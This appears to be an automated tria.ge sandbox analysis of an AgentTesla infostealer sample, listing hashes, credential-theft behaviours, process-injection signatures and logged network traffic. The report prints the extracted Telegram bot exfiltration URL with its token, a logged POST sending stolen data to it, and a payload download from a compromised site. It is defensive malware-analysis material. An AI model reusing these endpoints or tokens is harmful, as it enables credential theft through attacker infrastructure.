Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21/12/2024, 01:03 UTC
Static task
static1
Behavioral task
behavioral1
Sample
243424396-041942-sanlccjavap0003-2745.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
243424396-041942-sanlccjavap0003-2745.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20241007-en
General
-
Target
243424396-041942-sanlccjavap0003-2745.exe
-
Size
485KB
-
MD5
570f75822327ab67501bcf60b5a5015d
-
SHA1
f8247519442122f8b727910ae977a3072b9e706e
-
SHA256
3e60205f7f9428199cf532ac669704b7c0b4112f35aa8061d6efc941948e9e35
-
SHA512
e2aa892438630c43d1fb07d5cf1ecc5781d6a8079385d4095eaa83aba9a5234a78111d396b91499b405adde712c4b6fb6be9db9dc7aaa16d6f5dcc64f3cea912
-
SSDEEP
6144:aasRfC5mAhrNngWKklCnLUP4igs2fr0hQtP9pDpmIblrsXU/4pd6nscwcT4UyO:erAvguoLUNUrfB99sGlrEpsncM
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Loads dropped DLL 1 IoCs
pid Process 4036 243424396-041942-sanlccjavap0003-2745.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4792 243424396-041942-sanlccjavap0003-2745.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4036 243424396-041942-sanlccjavap0003-2745.exe 4792 243424396-041942-sanlccjavap0003-2745.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4036 set thread context of 4792 4036 243424396-041942-sanlccjavap0003-2745.exe 95 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Alebion\armenian.iso 243424396-041942-sanlccjavap0003-2745.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 243424396-041942-sanlccjavap0003-2745.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 243424396-041942-sanlccjavap0003-2745.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4792 243424396-041942-sanlccjavap0003-2745.exe 4792 243424396-041942-sanlccjavap0003-2745.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4036 243424396-041942-sanlccjavap0003-2745.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4792 243424396-041942-sanlccjavap0003-2745.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4036 wrote to memory of 4792 4036 243424396-041942-sanlccjavap0003-2745.exe 95 PID 4036 wrote to memory of 4792 4036 243424396-041942-sanlccjavap0003-2745.exe 95 PID 4036 wrote to memory of 4792 4036 243424396-041942-sanlccjavap0003-2745.exe 95 PID 4036 wrote to memory of 4792 4036 243424396-041942-sanlccjavap0003-2745.exe 95 PID 4036 wrote to memory of 4792 4036 243424396-041942-sanlccjavap0003-2745.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe"C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe"C:\Users\Admin\AppData\Local\Temp\243424396-041942-sanlccjavap0003-2745.exe"2⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request73.144.22.2.in-addr.arpaIN PTRResponse73.144.22.2.in-addr.arpaIN PTRa2-22-144-73deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request154.239.44.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.kupito.baIN AResponsewww.kupito.baIN CNAMEkupito.bakupito.baIN A51.77.82.235
-
Remote address:51.77.82.235:80RequestGET /css/SGtwXnVLIMcTOSxLvL72.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: www.kupito.ba
Cache-Control: no-cache
ResponseHTTP/1.1 301 Moved Permanently
Keep-Alive: timeout=5, max=100
content-type: text/html
content-length: 795
date: Sat, 21 Dec 2024 01:04:22 GMT
server: LiteSpeed
location: https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bin
-
Remote address:51.77.82.235:443RequestGET /css/SGtwXnVLIMcTOSxLvL72.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: www.kupito.ba
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Keep-Alive: timeout=5, max=100
content-type: application/octet-stream
last-modified: Fri, 20 Dec 2024 02:47:29 GMT
accept-ranges: bytes
content-length: 240192
date: Sat, 21 Dec 2024 01:04:23 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
-
Remote address:8.8.8.8:53Requestr11.o.lencr.orgIN AResponser11.o.lencr.orgIN CNAMEo.lencr.edgesuite.neto.lencr.edgesuite.netIN CNAMEa1887.dscq.akamai.neta1887.dscq.akamai.netIN A2.22.144.142a1887.dscq.akamai.netIN A2.22.144.149
-
Remote address:8.8.8.8:53Request235.82.77.51.in-addr.arpaIN PTRResponse235.82.77.51.in-addr.arpaIN PTRcp2webhostba
-
Remote address:8.8.8.8:53Request61.45.26.184.in-addr.arpaIN PTRResponse61.45.26.184.in-addr.arpaIN PTRa184-26-45-61deploystaticakamaitechnologiescom
-
GEThttp://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D243424396-041942-sanlccjavap0003-2745.exeRemote address:2.22.144.142:80RequestGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r11.o.lencr.org
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "F907D0DD14501EA8C86F39FC668D0089C52E8B8E21CFB32A4B54EB87B0071FB6"
Last-Modified: Fri, 20 Dec 2024 23:15:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21557
Expires: Sat, 21 Dec 2024 07:03:40 GMT
Date: Sat, 21 Dec 2024 01:04:23 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Request142.144.22.2.in-addr.arpaIN PTRResponse142.144.22.2.in-addr.arpaIN PTRa2-22-144-142deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request86.49.80.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
POSThttps://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument243424396-041942-sanlccjavap0003-2745.exeRemote address:149.154.167.220:443RequestPOST /bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8dd215b6f2248ce
Host: api.telegram.org
Content-Length: 1365
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 01:04:36 GMT
Content-Type: application/json
Content-Length: 640
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
Remote address:8.8.8.8:53Request220.167.154.149.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
51.77.82.235:80http://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.binhttp243424396-041942-sanlccjavap0003-2745.exe692 B 1.2kB 11 4
HTTP Request
GET http://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.binHTTP Response
301 -
51.77.82.235:443https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.bintls, http243424396-041942-sanlccjavap0003-2745.exe11.6kB 286.7kB 218 213
HTTP Request
GET https://www.kupito.ba/css/SGtwXnVLIMcTOSxLvL72.binHTTP Response
200 -
2.22.144.142:80http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3Dhttp243424396-041942-sanlccjavap0003-2745.exe518 B 1.1kB 6 4
HTTP Request
GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgPfDP9bv1d%2BZ4m4ePY5fOSmOw%3D%3DHTTP Response
200 -
149.154.167.220:443https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocumenttls, http243424396-041942-sanlccjavap0003-2745.exe2.6kB 7.4kB 13 13
HTTP Request
POST https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocumentHTTP Response
200
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
232.168.11.51.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
73.144.22.2.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
196.249.167.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
154.239.44.20.in-addr.arpa
-
59 B 89 B 1 1
DNS Request
www.kupito.ba
DNS Response
51.77.82.235
-
61 B 160 B 1 1
DNS Request
r11.o.lencr.org
DNS Response
2.22.144.1422.22.144.149
-
71 B 99 B 1 1
DNS Request
235.82.77.51.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
61.45.26.184.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
142.144.22.2.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
206.23.85.13.in-addr.arpa
-
70 B 145 B 1 1
DNS Request
86.49.80.91.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
api.telegram.org
DNS Response
149.154.167.220
-
74 B 167 B 1 1
DNS Request
220.167.154.149.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
3Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5cf85183b87314359488b850f9e97a698
SHA16b6c790037eec7ebea4d05590359cb4473f19aea
SHA2563b6a5cb2a3c091814fce297c04fb677f72732fb21615102c62a195fdc2e7dfac
SHA512fe484b3fc89aeed3a6b71b90b90ea11a787697e56be3077154b6ddc2646850f6c38589ed422ff792e391638a80a778d33f22e891e76b5d65896c6fb4696a2c3b